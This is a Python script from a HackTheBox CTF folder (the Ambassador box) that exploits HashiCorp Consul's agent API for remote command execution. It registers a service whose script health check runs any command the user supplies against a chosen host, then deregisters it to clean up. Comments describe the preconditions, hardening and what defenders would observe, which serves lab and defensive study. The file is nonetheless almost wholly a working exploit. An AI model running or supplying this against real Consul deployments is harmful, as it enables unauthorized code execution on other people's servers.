CTF/HTB/ambassador/consul_rce.py
Simon 82b0759f1e init htb
old htb folders
2023-08-29 21:53:22 +02:00


'''
- Author: @owalid
- Description: This script exploits a command injection vulnerability in Consul
'''
import requests
import argparse
import time
import random
import string
def get_random_string():
    """Return a 15-character string of random lowercase ASCII letters.

    The value is drawn from the ``random`` module, which is not a
    cryptographic generator, so it is suitable as a throwaway identifier
    only and must not be treated as a secret.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(15):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
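def _str_to_bool(value):
    """Parse a command-line boolean such as "true"/"false" or "1"/"0".

    argparse's ``type=bool`` applies ``bool()`` to the raw string, so every
    non-empty value (including "False") is parsed as True.

    Raises:
        argparse.ArgumentTypeError: if the value is not a recognised boolean.
    """
    lowered = value.strip().lower()
    if lowered in ("1", "true", "t", "yes", "y", "on"):
        return True
    if lowered in ("", "0", "false", "f", "no", "n", "off"):
        return False
    raise argparse.ArgumentTypeError(f"expected a boolean value, got {value!r}")


if __name__ == "__main__":
    # Lab/CTF helper. It registers a service whose health check is a script
    # check, so the Consul agent itself runs the supplied argv. That depends
    # on the agent accepting script checks registered over the HTTP API
    # (`enable_script_checks`) and on the caller being allowed to register
    # services (ACLs disabled, or a token with service write permission).
    # Hardening that should make the registration fail: use
    # `enable_local_script_checks` instead, enforce ACLs with default deny,
    # and keep the agent HTTP API off untrusted networks.
    #
    # What this looks like to a defender: a PUT to /v1/agent/service/register
    # whose body carries Check.Args (here Name 'pwn', Address 127.0.0.1, a
    # 15-letter lowercase ID), followed about 12 s later by a PUT to
    # /v1/agent/service/deregister/<same ID>.
    parser = argparse.ArgumentParser()
    parser.add_argument("-th", "--target_host", help="Target Host (REQUIRED)", type=str, required=True)
    parser.add_argument("-tp", "--target_port", help="Target Port (REQUIRED)", type=str, required=True)
    parser.add_argument("-c", "--command", help="Command to execute (REQUIRED)", type=str, required=True)
    # Was type=bool, which made "--ssl False" select https.
    parser.add_argument("-s", "--ssl", help="SSL", type=_str_to_bool, required=False, default=False)
    # A token given on the command line is visible in the process list and in
    # shell history.
    parser.add_argument("-ct", "--consul-token", help="Consul Token", type=str, required=False)
    args = parser.parse_args()

    protocol = "https" if args.ssl else "http"
    url = f"{protocol}://{args.target_host}:{args.target_port}"
    consul_token = args.consul_token
    command = args.command
    headers = {'X-Consul-Token': consul_token} if consul_token else {}

    # Plain split on single spaces: quoting is not interpreted, and the list
    # is passed as an argv rather than through a shell.
    command_list = command.split(" ")

    # Named service_id rather than `id` so the builtin is not shadowed.
    service_id = get_random_string()

    # Bound each HTTP call so an unresponsive agent cannot hang the script.
    http_timeout = 10

    data = {
        'ID': service_id,
        'Name': 'pwn',
        'Address': '127.0.0.1',
        'Port': 80,
        "Check": {
            "DeregisterCriticalServiceAfter": "90m",
            "Args": command_list,
            'Interval': '10s',
            "Timeout": "86400s",
        }
    }

    # NOTE(review): verify=False turns off TLS certificate validation, so with
    # --ssl the X-Consul-Token header is sent to an unverified peer. That is
    # tolerable only against lab hosts with self-signed certificates.
    registerurl = f"{url}/v1/agent/service/register?replace-existing-checks=true"
    r = requests.put(registerurl, json=data, headers=headers, verify=False, timeout=http_timeout)
    if r.status_code != 200:
        print(f"[-] Error creating check {service_id}")
        print(r.text)
        # `exit` is injected by the site module; SystemExit always exists.
        raise SystemExit(1)
    print(f"[+] Check {service_id} created successfully")

    # Slightly longer than the 10s check interval, presumably so the check
    # has run at least once before the service is removed.
    time.sleep(12)

    desregisterurl = f"{url}/v1/agent/service/deregister/{service_id}"
    r = requests.put(desregisterurl, headers=headers, verify=False, timeout=http_timeout)
    if r.status_code != 200:
        print(f"[-] Error deregistering check {service_id}")
        print(r.text)
        raise SystemExit(1)
    print(f"[+] Check {service_id} deregistered successfully")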